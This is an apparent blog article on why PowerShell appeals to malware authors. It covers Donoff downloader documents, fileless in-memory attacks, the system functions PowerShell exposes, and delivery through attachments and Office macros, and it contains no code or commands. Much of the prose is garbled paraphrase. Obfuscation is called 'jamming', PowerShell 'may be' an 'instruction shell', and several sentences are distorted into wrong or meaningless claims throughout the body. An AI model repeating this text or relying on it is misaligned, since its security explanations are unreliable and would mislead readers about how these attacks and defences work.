Windows Powershell An Attack Vector Increasingly Popular With Cyber Criminals
The cyber threat landscape has seen a 117% increase within malware using PowerShell, thanks to the proliferation of Donoff malicious files. As a result, new malware using Microsoft Office is up 103% from the primary quarter numbers, including noticeable growth thanks to documents that enable PowerShell, namely Donoff. Microsoft Office Donoff files act as computer virus downloaders using the Windows command system to launch PowerShell and proceed to download and execute malicious files. Donoff was instrumental within the 689% increase in malicious PowerShell code in Q1 2020, consistent with McAfee.
Windows PowerShell may be a .NET class-based instruction shell and scripting language that helps system administrators automate managing operating systems. It’s a robust tool employed by many administrators and users to automate and control many OS functions. Such an influence to activate or deactivate the functions of the OS can only arouse the interest of the actors of the threat.
Stealth is another popular feature of PowerShell attacks. Traditional attacks believe malware is developed as applications. These are executable codes that have got to be stored somewhere and executed, thus likely to trigger signature or behavior-based detection tools. In contrast, attacks without executable files reside in RAM to evade scanners and traditional detection methods. PowerShell, a legitimate tool, then provides a perfect cover to travel unnoticed. The attackers only need to download the payloads and begin the infection process.
Attackers also can use jamming techniques to evade detection. Remote downloading and code execution may be a powerful technique employed by malware to evade detection. Commands often want to run a script remotely without ever asking the user’s machine.
Which Open Up A Good Range Of Possibilities
Once access to the system is active, attackers have the right choice of possibilities because PowerShell gives them access to a mess of system functions and here are:
- A robust scripting environment,
- Direct access to network sockets,
- The ability to activate or deactivate protocols,
- The ability to dynamically assemble malicious binaries in memory,
- Direct access to the Win32 application programming interface (API),
- Direct interfacing with Windows Management Instrumentation (WMI),
- The possibility of invoking dynamic calls and runtimes,
- Easy access to encryption libraries, for instance, IPSec or hash algorithms,
- The possibility of hooking the managed code,
- Direct links to the COM model.
Propagation And Jamming Techniques At Work
Once inside the OS, attackers have the right choice of infection possibilities by utilizing malicious scripts. Privilege escalation may be a standard method of executing malware using PowerShell instruction. Although PowerShell cannot run scripts by default, there are several ways around this restriction by using the “-command” argument.
Propagation techniques believe running scripts, also as accessing network protocols and sockets. Encapsulated in email attachments with various extensions like .wsf, .html, .pdf, .js or the other desktop extension like .pptx, xlsx, scripts are wont to launch payloads. Another common propagation method is to use Office macros. This is often a specialized technique because the macro itself doesn’t contain the malicious code. Macros are integrated into documents in metadata like cells in an Excel table, for instance. The macro-commands are executed directly, and therefore the scanning of those by a protection tool wouldn’t detect anything abnormal.
The main problem with combating attacks through PowerShell is that it’s generally considered a trusted application by the security software since it’s a part of Windows. It’s therefore crucial that these techniques are prevented at the source. A direct approach is to possess PowerShell settings and secure execution processes and updates to the original recent versions of Windows and its tools.
Also Read: Tips To Avoid The Voice Hacking